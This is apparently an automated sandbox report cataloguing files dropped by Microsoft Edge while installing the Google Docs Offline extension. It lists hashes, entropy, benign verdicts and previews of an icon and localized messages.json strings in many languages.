                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1285
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                  MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                  SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                  SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                  SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                  MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                  SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                  SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                  SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                  MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                  SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                  SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                  SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                  MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                  SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                  SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                  SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                  MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                  SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                  SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                  SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                  MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                  SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                  SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                  SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                  MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                  SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                  SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                  SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                  MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                  SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                  SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                  SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                  MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                  SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                  SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                  SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                  MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                  SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                  SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                  SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                  Malicious:false
